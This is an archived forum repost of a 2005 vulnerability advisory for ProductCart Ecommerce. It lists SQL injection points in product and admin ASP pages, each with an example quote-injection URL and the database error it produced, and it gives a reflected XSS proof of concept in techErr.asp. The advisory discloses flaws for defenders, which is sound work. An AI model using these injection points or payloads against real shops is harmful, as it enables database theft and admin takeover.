Multiple Sql Injection In Productcart Ecommerce

Full Version: Multiple Sql Injection In Productcart Ecommerce

GovernmentSecurity.org > General GSO > Exploit & Vulnerability Mailing List Archives

qcred11

Jun 9 2005, 01:16 AM

QUOTE

Author: Dedi Dwianto
Date: June, 07th 2005
Location: Indonesia, Jakarta

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : ProductCart Ecommerce
version : < 2.7
url : http://www.earlyimpact.com/
Author: Early Impact
Description:

ProductCart Ecommerce is popular ecommerce software.In somepages this
software
was filter query sql with add file msg.asp. but i found new bug where user
can
input sql query.

Vulnerabilitie:
~~~~~~~~~~~~~~~~

A. SQL Injection

* http://victim/pc/viewPrd.asp?idcategory=[catid][SQL
INJECTION]&idproduct=[prod id]

ex :
http://victim/pc/viewPrd.asp?idcategory=16'&idproduct=42

Error :
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in
query expression 'idcategory=16''.
/apparel/productcart/pc/include-metatags.asp, line 87

* http://victim/pc/pcadmin/editCategories.asp?nav=&lid=[id cat][sql
injection]

ex :
http://victim/pc/pcadmin/editCategories.as...v=&lid=123'

Error :
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in
query expression 'idCategory=123' ORDER BY categoryDesc'.

/apparel/productcart/pcadmin/editCategories.asp, line 69

*
http://victim/pc/pcadmin/modCustomCardPaym...?mode=Edit&idc=[page][sqlinjection]&id=[id]&gwCode=[code]

Ex :
http://victim/pc/pcadmin/modCustomCardPaym...d=55&gwCode=101

Error :

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing
operator) in query expression
'(((customCardTypes.idcustomCardType)=1') AND
((payTypes.gwCode)=101'))'.

/apparel/productcart/pcadmin/modCustomCardPaymentOpt.asp, line 162

*
http://victim/pc/pcadmin/OptionFieldsEdit.asp?idc=1&id=[id]&idccr=[id][sql
Injection]

Ex :
http://victim/pc/pcadmin/OptionFieldsEdit....55&idccr=2'

Error :

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in
query expression 'idCustomCardRules=2';'.

/apparel/productcart/pcadmin/OptionFieldsEdit.asp, line

And XSS
POC :
http://victim/pc/pcadmin/techErr.asp?error=[XSS]
http://victim/pc/pcadmin/techErr.asp?error...</script>

B. Fix
Sorry I can't give solution because i can't view source code becase
that's commersial Software.
Contact vendor No response.

Link is unavailable

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.